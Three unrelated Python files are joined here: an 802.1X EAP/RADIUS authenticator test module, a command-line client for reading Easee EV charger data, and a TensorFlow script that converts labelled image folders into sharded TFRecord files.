from heartbeat_scheduler import HeartbeatScheduler
from radius_module import RadiusModule, RadiusPacketInfo, RadiusSocketInfo, port_id_to_int
from message_parser import IdentityMessage, FailureMessage
import json
import threading
import time
import utils
class AuthStateMachine:
"""Authenticator state machine"""
START = "start"
SUPPLICANT = "Talk to Supplicant"
RADIUS = "Talk to RADIUS server"
FAIL = "Test Failed"
SUCCESS = "Test Succeeded"
def __init__(self, src_mac, auth_mac, idle_time, retry_count,
eap_send_callback, radius_send_callback, auth_callback):
self.state = None
self._state_lock = threading.Lock()
self._timer_lock = threading.RLock()
self.logger = utils.get_logger('AuthSM')
self.src_mac = src_mac
self.eap_send_callback = eap_send_callback
self.radius_send_callback = radius_send_callback
self.auth_callback = auth_callback
self.identity = None
self.authentication_mac = auth_mac
self.radius_state = None
self._idle_time = idle_time
self._max_retry_count = retry_count
self._current_timeout = None
self._retry_func = None
self._retry_args = None
self._current_retries = None
def initialize(self):
"""Initialize state machine"""
self._state_transition(self.START)
self._set_timeout(self._idle_time)
self._set_retry_actions(retry_func=self.eap_send_callback, retry_args=[self.src_mac])
def _state_transition(self, target, expected=None):
with self._state_lock:
if expected is not None:
message = 'state was %s expected %s' % (self.state, expected)
assert self.state == expected, message
self.logger.debug('Transition for %s: %s -> %s', self.src_mac, self.state, target)
self.state = target
def received_eapol_start(self):
"""Received EAPOL start on EAP socket"""
self._state_transition(self.SUPPLICANT, self.START)
self._set_timeout(self._idle_time)
self._set_retry_actions(retry_func=self.eap_send_callback, retry_args=[self.src_mac])
self.eap_send_callback(self.src_mac)
def received_eap_request(self, eap_message):
"""Received EAP request"""
if isinstance(eap_message, IdentityMessage) and not self.identity:
self.identity = eap_message.identity
self._state_transition(self.RADIUS, self.SUPPLICANT)
port_id = port_id_to_int(self.authentication_mac)
radius_packet_info = RadiusPacketInfo(
eap_message, self.src_mac, self.identity, self.radius_state, port_id)
self._set_timeout(self._idle_time)
self._set_retry_actions(
retry_func=self.radius_send_callback, retry_args=[radius_packet_info])
self.radius_send_callback(radius_packet_info)
def received_radius_response(self, payload, radius_state, packet_type):
"""Received RADIUS access channel"""
self.radius_state = radius_state
if packet_type == 'RadiusAccessReject':
self._state_transition(self.FAIL, self.RADIUS)
eap_message = FailureMessage(self.src_mac, 255)
self.auth_callback(self.src_mac, False)
else:
eap_message = payload
if packet_type == 'RadiusAccessAccept':
self._state_transition(self.SUCCESS, self.RADIUS)
self.auth_callback(self.src_mac, True)
else:
self._state_transition(self.SUPPLICANT, self.RADIUS)
self._set_timeout(self._idle_time)
self._set_retry_actions(
retry_func=self.eap_send_callback, retry_args=[self.src_mac, eap_message])
self.eap_send_callback(self.src_mac, eap_message)
def _set_timeout(self, timeout_time=None, clear=False):
with self._timer_lock:
if clear:
self._current_timeout = None
else:
self._current_timeout = time.time() + timeout_time
def _set_retry_actions(self, retry_func=None, retry_args=None):
self._retry_func = retry_func
self._retry_args = list(retry_args)
self._current_retries = 0
def _clear_retry_actions(self):
self._retry_func = None
self._retry_args = None
self._current_retries = 0
def handle_timer(self):
"""Handle timer and check if timeout is exceeded"""
with self._timer_lock:
if self._current_timeout:
if time.time() > self._current_timeout:
if self._current_retries < self._max_retry_count:
self._current_retries += 1
self._set_timeout(self._idle_time)
self._retry_func(*self._retry_args)
else:
self._handle_timeout()
def _handle_timeout(self):
self._state_transition(self.FAIL)
self._set_timeout(clear=True)
eap_message = FailureMessage(self.src_mac, 255)
self.auth_callback(self.src_mac, False)
self.eap_send_callback(self.src_mac, eap_message)
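# A minimal sketch (not part of the original module) of how AuthStateMachine is driven; the
# callback names are placeholders supplied by the caller:
#
#   sm = AuthStateMachine('00:11:22:33:44:55', 'aa:bb:cc:dd:ee:ff', idle_time=9, retry_count=3,
#                         eap_send_callback=send_eap, radius_send_callback=send_radius,
#                         auth_callback=record_result)
#   sm.initialize()                 # enter START and arm the idle timeout
#   sm.received_eapol_start()       # START -> SUPPLICANT, identity request sent to the supplicant
#   sm.received_eap_request(msg)    # SUPPLICANT -> RADIUS, request forwarded to the RADIUS server
#   sm.received_radius_response(payload, state, 'RadiusAccessAccept')  # RADIUS -> SUCCESS
#
# Periodic calls to sm.handle_timer() re-send the last message until _max_retry_count is
# exceeded, after which the machine transitions to FAIL.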
class Authenticator:
"""Authenticator to manage Authentication flow"""
HEARTBEAT_INTERVAL = 3
IDLE_TIME = 9
RETRY_COUNT = 3
RADIUS_PORT = 1812
EAPOL_IDLE_TIME = 180
def __init__(self, config_file):
self.state_machines = {}
self.results = {}
self.eap_module = None
self.radius_module = None
self.logger = utils.get_logger('Authenticator')
self._config_file = config_file
self._threads = []
self._radius_socket_info = None
self._radius_secret = None
self._radius_id = None
self._interface = None
self._idle_time = None
self._max_retry_count = None
self._current_timeout = None
self._debug = False
self._setup()
def _load_config(self):
with open(self._config_file, 'r') as file_stream:
full_config = json.load(file_stream)
config = full_config.get('modules').get('dot1x')
self._debug = config.get('debug')
if self._debug:
utils.enable_debug_logs(self.logger)
self.logger.debug('Loaded config from %s:\n %s', self._config_file, config)
self._interface = config.get('interface', utils.get_interface_name())
radius_config = config.get('radius_server', {})
radius_socket_info = radius_config.get('radius_socket_info', {})
listen_ip = radius_socket_info.get('listen_ip', utils.get_interface_ip(self._interface))
listen_port = radius_socket_info.get('listen_port', 0)
remote_ip = radius_socket_info.get('remote_ip', '127.0.0.1')
remote_port = radius_socket_info.get('remote_port', self.RADIUS_PORT)
self._radius_socket_info = RadiusSocketInfo(listen_ip, listen_port, remote_ip, remote_port)
self._radius_secret = radius_config.get('secret', 'SECRET')
self._radius_id = radius_config.get('id', utils.get_interface_mac(self._interface))
def _setup(self):
self._load_config()
self.radius_module = RadiusModule(
self._radius_socket_info, self._radius_secret,
self._radius_id, self.received_radius_response)
self.eap_module = EapModule(self._interface, self.received_eap_request)
if self._debug:
utils.enable_debug_logs(self.radius_module.logger)
utils.enable_debug_logs(self.eap_module.logger)
# TODO: Take value from config and then revert to default
interval = self.HEARTBEAT_INTERVAL
# TODO: Take value from config and then revert to default
self._idle_time = self.IDLE_TIME
self._max_retry_count = self.RETRY_COUNT
self.sm_timer = HeartbeatScheduler(interval)
self.sm_timer.add_callback(self.handle_sm_timeout)
self._current_timeout = time.time() + self.EAPOL_IDLE_TIME
def start_threads(self):
self.logger.info('Starting SM timer')
self.sm_timer.start()
self.logger.info('Listening for EAP and RADIUS.')
def build_thread(method):
self._threads.append(threading.Thread(target=method))
build_thread(self.radius_module.receive_radius_messages)
build_thread(self.radius_module.send_radius_messages)
build_thread(self.eap_module.receive_eap_messages)
build_thread(self.eap_module.send_eap_messages)
for thread in self._threads:
thread.start()
for thread in self._threads:
thread.join()
self.logger.info('Done listening for EAP and RADIUS packets.')
def _end_authentication(self):
self.logger.info('Stopping timer')
if self.sm_timer:
self.sm_timer.stop()
self.logger.info('Shutting down modules.')
self.radius_module.shut_down_module()
self.eap_module.shut_down_module()
def received_eap_request(self, src_mac, eap_message, is_eapol):
if is_eapol:
if not (src_mac in self.state_machines or src_mac in self.results):
self.logger.info('Starting authentication for %s' % (src_mac))
auth_mac = self.eap_module.get_auth_mac()
state_machine = AuthStateMachine(
src_mac, auth_mac,
self._idle_time, self._max_retry_count,
self.send_eap_response, self.send_radius_request,
self.process_test_result)
state_machine.initialize()
self.state_machines[src_mac] = state_machine
state_machine.received_eapol_start()
else:
self.logger.warning(
'Authentication for %s is in progress or has been completed' % (src_mac))
else:
state_machine = self.state_machines[src_mac]
state_machine.received_eap_request(eap_message)
def received_radius_response(self, src_mac, radius_attributes, packet_type):
eap_message = radius_attributes.eap_message
radius_state = radius_attributes.state
state_machine = self.state_machines[src_mac]
state_machine.received_radius_response(eap_message, radius_state, packet_type)
def send_eap_response(self, src_mac, message=None):
if not message:
self.eap_module.send_eapol_response(src_mac)
else:
self.eap_module.send_eap_message(src_mac, message)
def send_radius_request(self, radius_packet_info):
self.radius_module.send_radius_packet(radius_packet_info)
def process_test_result(self, src_mac, is_success):
if is_success:
self.logger.info('Authentication successful for %s' % (src_mac))
else:
if src_mac:
self.logger.info('Authentication failed for %s' % (src_mac))
else:
self.logger.info('Authentication failed. Received no EAPOL packets.')
if src_mac:
self.results[src_mac] = is_success
self.state_machines.pop(src_mac)
# TODO: We currently finalize results as soon as we get a result for a src_mac.
# Needs to be changed if we support multiple devices.
self._end_authentication()
def run_authentication_test(self):
self.start_threads()
result_str = ""
test_result = ""
if not self.results:
result_str = "Authentication failed. No EAPOL messages received."
test_result = "skip"
else:
test_result = "pass"
for src_mac, is_success in self.results.items():
if is_success:
result = 'succeeded'
else:
result = 'failed'
test_result = "fail"
result_str += "Authentication for %s %s." % (src_mac, result)
return result_str, test_result
def handle_sm_timeout(self):
if not self.state_machines and self._current_timeout:
if time.time() > self._current_timeout:
self.process_test_result(None, False)
else:
for state_machine in self.state_machines.values():
state_machine.handle_timer()
def main():
    import sys
    # Authenticator requires a config file path; here it is taken from the command line.
    authenticator = Authenticator(sys.argv[1])
    print(authenticator.run_authentication_test())
if __name__ == '__main__':
main()
|
__main__.py
|
import asyncio
import json
import logging
import argparse
import threading
import sys
from typing import List
from .utils import lookup_charger_stream_id, lookup_equalizer_stream_id
from . import Easee, Charger, Site, Circuit, Equalizer, DatatypesStreamData
CACHED_TOKEN = "easee-token.json"
_LOGGER = logging.getLogger(__file__)
def add_input(queue):
queue.put_nowait(sys.stdin.read(1))
async def print_signalr(id, data_type, data_id, value):
type_str = DatatypesStreamData(data_type).name
if id[0] == "Q":
data_str = lookup_equalizer_stream_id(data_id)
else:
data_str = lookup_charger_stream_id(data_id)
print(f"SR: {id} data type {data_type} {type_str} data id {data_id} {data_str} value {value}")
def parse_arguments():
parser = argparse.ArgumentParser(description="Read data from your Easee EV installation")
parser.add_argument("-u", "--username", help="Username", required=True)
parser.add_argument("-p", "--password", help="Password", required=True)
parser.add_argument("-c", "--chargers", help="Get chargers information", action="store_true")
parser.add_argument("-s", "--sites", help="Get sites information", action="store_true")
parser.add_argument("-ci", "--circuits", help="Get circuits information", action="store_true")
parser.add_argument("-e", "--equalizers", help="Get equalizers information", action="store_true")
parser.add_argument(
"-a",
"--all",
help="Get all sites, circuits, equalizers and chargers information",
action="store_true",
)
parser.add_argument(
"-sum",
"--summary",
help="Get summary of sites, circuits, equalizers and chargers information",
action="store_true",
)
parser.add_argument("-l", "--loop", help="Loop charger data every 5 seconds", action="store_true")
parser.add_argument("-r", "--signalr", help="Listen to signalr stream", action="store_true")
parser.add_argument("--countries", help="Get active countries information", action="store_true")
parser.add_argument(
"-d",
"--debug",
help="Print debugging statements",
action="store_const",
dest="loglevel",
const=logging.DEBUG,
default=logging.WARNING,
)
parser.add_argument(
"-v",
"--verbose",
help="Be verbose",
action="store_const",
dest="loglevel",
const=logging.INFO,
)
args = parser.parse_args()
logging.basicConfig(
format="%(asctime)-15s %(name)-5s %(levelname)-8s %(message)s",
level=args.loglevel,
)
return args
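# Example invocation (the package name used with `python -m` depends on how the module is
# installed and is only an assumption here):
#   python -m easee -u my_user -p my_password --summary
#   python -m easee -u my_user -p my_password -r   # stream signalr updates until a key is pressed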
# TODO: Add option to send in a cached token
# def token_read():
# try:
# with open(CACHED_TOKEN, "r") as token_file:
# return json.load(token_file)
# except FileNotFoundError:
# return None
# def token_write(token):
# with open(CACHED_TOKEN, "w") as token_file:
# json.dump(token, token_file, indent=2)
async def async_main():
args = parse_arguments()
_LOGGER.debug("args: %s", args)
easee = Easee(args.username, args.password)
if args.chargers:
chargers: List[Charger] = await easee.get_chargers()
await chargers_info(chargers)
if args.sites:
sites: List[Site] = await easee.get_sites()
await sites_info(sites)
if args.circuits:
sites: List[Site] = await easee.get_sites()
for site in sites:
await circuits_info(circuits=site.get_circuits())
if args.equalizers:
sites: List[Site] = await easee.get_sites()
for site in sites:
await equalizers_info(equalizers=site.get_equalizers())
if args.countries:
countries_active = await easee.get_active_countries()
print(json.dumps(countries_active, indent=2))
if args.all:
sites: List[Site] = await easee.get_sites()
await sites_info(sites)
for site in sites:
equalizers = site.get_equalizers()
await equalizers_info(equalizers)
circuits = site.get_circuits()
await circuits_info(circuits)
for circuit in circuits:
chargers = circuit.get_chargers()
await chargers_info(chargers)
if args.summary:
sites: List[Site] = await easee.get_sites()
        circuits: List[Circuit] = []
        chargers: List[Charger] = []
        equalizers: List[Equalizer] = []
for site in sites:
print(
f" "
f" Site: {site.__getitem__('name')}"
f" (ID: {site.id}),"
f" {site.__getitem__('address')['street']},"
f" main fuse {site.__getitem__('ratedCurrent')}A"
f" "
)
equalizers = site.get_equalizers()
for equalizer in equalizers:
print(
f" "
f" Equalizer: #{equalizer.__getitem__('name')}"
f" (ID: {equalizer.id})"
f" SiteID: #{equalizer.__getitem__('siteId')}"
f" CircuitId: #{equalizer.__getitem__('circuitId')}"
f" "
)
circuits = site.get_circuits()
for circuit in circuits:
print(
f" "
f" Circuit: #{circuit.__getitem__('circuitPanelId')}"
f" {circuit.__getitem__('panelName')}"
f" (ID: {circuit.id})"
f" {circuit.__getitem__('ratedCurrent')}A"
f" "
)
chargers = circuit.get_chargers()
for charger in chargers:
state = await charger.get_state()
config = await charger.get_config()
print(
f" "
f" Charger: {charger.__getitem__('name')}"
f" (ID: {charger.id}),"
f" enabled: {config.__getitem__('isEnabled')}"
f" online: {state.__getitem__('isOnline')}"
f" version: {state.__getitem__('chargerFirmware')}"
f" voltage: {round(state.__getitem__('voltage'),1)}"
f" current: {round(state.__getitem__('outputCurrent'),1)}"
f" "
)
print(f"\n\nFound {len(sites)} site(s), {len(circuits)} circuit(s) and {len(chargers)} charger(s).")
if args.loop:
sites: List[Site] = await easee.get_sites()
for site in sites:
circuits = site.get_circuits()
for circuit in circuits:
chargers = circuit.get_chargers()
try:
header = True
while True:
for charger in chargers:
await charger_loop(charger, header)
header = False
await asyncio.sleep(5)
except KeyboardInterrupt as e: # noqa
                    # Close connection on user interruption
print("Interrupted by user")
await easee.close()
except Exception as e:
print(e)
await easee.close()
if args.signalr:
chargers: List[Charger] = await easee.get_chargers()
equalizers = []
sites: List[Site] = await easee.get_sites()
for site in sites:
equalizers_site = site.get_equalizers()
for equalizer in equalizers_site:
equalizers.append(equalizer)
for charger in chargers:
await easee.sr_subscribe(charger, print_signalr)
for equalizer in equalizers:
await easee.sr_subscribe(equalizer, print_signalr)
queue = asyncio.Queue(1)
input_thread = threading.Thread(target=add_input, args=(queue,))
input_thread.daemon = True
input_thread.start()
while True:
await asyncio.sleep(1)
if queue.empty() is False:
# print "\ninput:", input_queue.get()
break
await easee.close()
async def chargers_info(chargers: List[Charger]):
print("\n\n****************\nCHARGERS\n****************")
data = []
for charger in chargers:
state = await charger.get_state()
config = await charger.get_config()
schedule = await charger.get_basic_charge_plan()
week_schedule = await charger.get_weekly_charge_plan()
ch = charger.get_data()
ch["state"] = state.get_data()
ch["config"] = config.get_data()
if schedule is not None:
ch["schedule"] = schedule.get_data()
if week_schedule is not None:
ch["week_schedule"] = week_schedule.get_data()
data.append(ch)
print(json.dumps(data, indent=2))
async def sites_info(sites: List[Site]):
print("\n\n****************\nSITES\n****************")
data = []
for site in sites:
data.append(site.get_data())
print(json.dumps(data, indent=2))
async def circuits_info(circuits: List[Circuit]):
print("\n\n****************\nCIRCUITS\n****************")
data = []
for circuit in circuits:
data.append(circuit.get_data())
print(json.dumps(data, indent=2))
async def equalizers_info(equalizers: List[Equalizer]):
print("\n\n****************\nEQUALIZERS\n****************")
data = []
for equalizer in equalizers:
eq = equalizer.get_data()
state = await equalizer.get_state()
config = await equalizer.get_config()
eq["state"] = state.get_data()
eq["config"] = config.get_data()
data.append(eq)
print(
json.dumps(
data,
indent=2,
)
)
async def charger_loop(charger: Charger, header=False):
"""Return the state attributes."""
# await charger.async_update()
state = await charger.get_state()
# config = await charger.get_config() # not used yet
if header:
print(str_fixed_length("NAME", 15), end=" ")
print(str_fixed_length("OPMODE", 20), end=" ")
print(str_fixed_length("ONLINE", 7), end=" ")
print(str_fixed_length("POWER", 7), end=" ")
print(str_fixed_length("OUTCURR", 10), end=" ")
print(str_fixed_length("IN_T2", 10), end=" ")
print(str_fixed_length("IN_T3", 10), end=" ")
print(str_fixed_length("IN_T4", 10), end=" ")
print(str_fixed_length("IN_T5", 10), end=" ")
print(str_fixed_length("VOLTAGE", 10), end=" ")
print(str_fixed_length("kWh", 10), end=" ")
print(str_fixed_length("RATE", 10), end=" ")
print(str_fixed_length("REASON", 25), end=" ")
print(" ")
print(str_fixed_length(f"{charger.name}", 15), end=" ")
print(str_fixed_length(f"{state.__getitem__('chargerOpMode')}", 20), end=" ")
print(str_fixed_length(f"{state.__getitem__('isOnline')}", 7), end=" ")
print(str_fixed_length(f"{round(state.__getitem__('totalPower'),2)}kW", 7), end=" ")
print(str_fixed_length(f"{round(state.__getitem__('outputCurrent'),1)}A", 10), end=" ")
print(str_fixed_length(f"{round(state.__getitem__('inCurrentT2'),1)}A", 10), end=" ")
print(str_fixed_length(f"{round(state.__getitem__('inCurrentT3'),1)}A", 10), end=" ")
print(str_fixed_length(f"{round(state.__getitem__('inCurrentT4'),1)}A", 10), end=" ")
print(str_fixed_length(f"{round(state.__getitem__('inCurrentT5'),1)}A", 10), end=" ")
print(str_fixed_length(f"{round(state.__getitem__('voltage'),1)}V", 10), end=" ")
print(
str_fixed_length(f"{round(state.__getitem__('sessionEnergy'),2)}kWh", 10),
end=" ",
)
print(
str_fixed_length(f"{round(state.__getitem__('energyPerHour'),2)}kWh/h", 10),
end=" ",
)
print(str_fixed_length(f"{str(state.__getitem__('reasonForNoCurrent'))}", 25), end=" ")
print(" ")
def str_fixed_length(myStr, length: int):
while len(myStr) < length:
myStr = myStr + " "
if len(myStr) > length:
myStr = myStr[0:length]
return myStr
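# Note: str_fixed_length(s, n) is equivalent to s.ljust(n)[:n]; it is kept as a helper to match
# the fixed-width column formatting used in charger_loop().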
def main():
asyncio.run(async_main())
if __name__ == "__main__":
import time
s = time.perf_counter()
main()
elapsed = time.perf_counter() - s
print(f"{__file__} executed in {elapsed:0.2f} seconds.")
|
tfrecord.py
|
# coding:utf-8
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts image data to TFRecords file format with Example protos.
The image data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/label_0/image0.jpeg
data_dir/label_0/image1.jpg
...
data_dir/label_1/weird-image.jpeg
data_dir/label_1/my-image.jpeg
...
where the sub-directory is the unique label associated with these images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of TFRecord files
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
where we have selected 1024 and 128 shards for each data set. Each record
within the TFRecord file is a serialized Example proto. The Example proto
contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
  image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
  image/class/label: integer specifying the index in a classification layer, starting from "class_label_base"
image/class/text: string specifying the human-readable version of the label
e.g. 'dog'
If your data set involves bounding boxes, please look at build_imagenet_data.py.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
import logging
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
value = tf.compat.as_bytes(value)
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, text, height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
text: string, unique human-readable, e.g. 'dog'
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/text': _bytes_feature(text),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(os.path.basename(filename)),
'image/encoded': _bytes_feature(image_buffer)}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
return '.png' in filename
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with open(filename, 'rb') as f:
image_data = f.read()
# Convert any PNG to JPEG's for consistency.
if _is_png(filename):
logging.info('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
texts, labels, num_shards, command_args):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s_%s_%.5d-of-%.5d.tfrecord' % (command_args.dataset_name, name, shard, num_shards)
output_file = os.path.join(command_args.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
text = texts[i]
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(filename, image_buffer, label,
text, height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
logging.info('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
logging.info('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
logging.info('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, texts, labels, num_shards, command_args):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(texts)
assert len(filenames) == len(labels)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
    spacing = np.linspace(0, len(filenames), command_args.num_threads + 1).astype(int)
ranges = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
logging.info('Launching %d threads for spacings: %s' % (command_args.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
texts, labels, num_shards, command_args)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
logging.info('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file, command_args):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the image data set resides in JPEG files located in
the following directory structure.
data_dir/dog/another-image.JPEG
data_dir/dog/my-image.jpg
where 'dog' is the label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
dog
cat
flower
where each line corresponds to a label. We map each label contained in
the file to an integer starting with the integer 0 corresponding to the
label contained in the first line.
Returns:
filenames: list of strings; each string is a path to an image file.
texts: list of strings; each string is the class, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth.
"""
logging.info('Determining list of input files and labels from %s.' % data_dir)
unique_labels = [l.strip() for l in tf.gfile.FastGFile(
labels_file, 'r').readlines()]
labels = []
filenames = []
texts = []
# Leave label index 0 empty as a background class.
"""非常重要,这里我们调整label从0开始以符合定义"""
label_index = command_args.class_label_base
# Construct the list of JPEG files and labels.
for text in unique_labels:
jpeg_file_path = '%s/%s/*' % (data_dir, text)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
texts.extend([text] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
logging.info('Finished finding files in %d of %d classes.' % (
label_index, len(labels)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
texts = [texts[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
logging.info('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(unique_labels), data_dir))
# print(labels)
return filenames, texts, labels
def _process_dataset(name, directory, num_shards, labels_file, command_args):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
labels_file: string, path to the labels file.
"""
filenames, texts, labels = _find_image_files(directory, labels_file, command_args)
_process_image_files(name, filenames, texts, labels, num_shards, command_args)
def check_and_set_default_args(command_args):
if not(hasattr(command_args, 'train_shards')) or command_args.train_shards is None:
command_args.train_shards = 5
if not(hasattr(command_args, 'validation_shards')) or command_args.validation_shards is None:
command_args.validation_shards = 5
if not(hasattr(command_args, 'num_threads')) or command_args.num_threads is None:
command_args.num_threads = 5
if not(hasattr(command_args, 'class_label_base')) or command_args.class_label_base is None:
command_args.class_label_base = 0
if not(hasattr(command_args, 'dataset_name')) or command_args.dataset_name is None:
command_args.dataset_name = ''
assert not command_args.train_shards % command_args.num_threads, (
'Please make the command_args.num_threads commensurate with command_args.train_shards')
assert not command_args.validation_shards % command_args.num_threads, (
'Please make the command_args.num_threads commensurate with '
'command_args.validation_shards')
assert command_args.train_directory is not None
assert command_args.validation_directory is not None
assert command_args.labels_file is not None
assert command_args.output_directory is not None
def main(command_args):
"""
command_args:需要有以下属性:
command_args.train_directory 训练集所在的文件夹。这个文件夹下面,每个文件夹的名字代表label名称,再下面就是图片。
command_args.validation_directory 验证集所在的文件夹。这个文件夹下面,每个文件夹的名字代表label名称,再下面就是图片。
command_args.labels_file 一个文件。每一行代表一个label名称。
command_args.output_directory 一个文件夹,表示最后输出的位置。
command_args.train_shards 将训练集分成多少份。
command_args.validation_shards 将验证集分成多少份。
command_args.num_threads 线程数。必须是上面两个参数的约数。
command_args.class_label_base 很重要!真正的tfrecord中,每个class的label号从多少开始,默认为0(在models/slim中就是从0开始的)
command_args.dataset_name 字符串,输出的时候的前缀。
图片不可以有损坏。否则会导致线程提前退出。
"""
check_and_set_default_args(command_args)
logging.info('Saving results to %s' % command_args.output_directory)
# Run it!
_process_dataset('validation', command_args.validation_directory,
command_args.validation_shards, command_args.labels_file, command_args)
